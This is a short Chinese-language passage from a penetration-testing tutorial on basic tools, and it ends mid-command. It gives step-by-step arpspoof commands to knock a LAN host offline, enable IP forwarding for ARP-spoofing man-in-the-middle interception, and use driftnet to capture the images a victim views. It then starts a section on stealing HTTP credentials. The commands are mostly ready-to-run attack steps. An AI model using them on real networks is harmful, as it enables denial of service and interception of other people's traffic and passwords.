渗透测试之基本工具
一、局域网断网 1、arp攻击----让目标主机断网 工具:arpspoof 命令格式:arpspoof -i 本机网卡 -t 目标ip 网关 Ctrl+c 终止攻击 查看局域网内在使用的ip fping -asg 192.168.1.0/24 2、arp欺骗-----在获取目标流量的时候不会出现断网现象 让目ip流量经过我的本地网卡,从我的网关出去,不会出现断网现象 echo 1 >/proc/sys/net/ipv4/ip_forward -------让目标流量从我的本地网关出去 (该命令没有回显内容) arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 -----让目标流量经过的网卡 driftnet ----获取本机网卡上的图片流量,通过arp欺骗即可获取目标主机浏览的图片 echo 1 >/proc/sys/net/ipv4/ip_forward cat /proc/sys/net/ipv4/ip_forward---回显为“1”表示echo 1 >/proc/sys/net/ipv4/ip_forward执行成功 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 driftnet -i eth0 -------------会弹出一个对话框,显示图片 3、获取HTTP账号密码 echo 1 >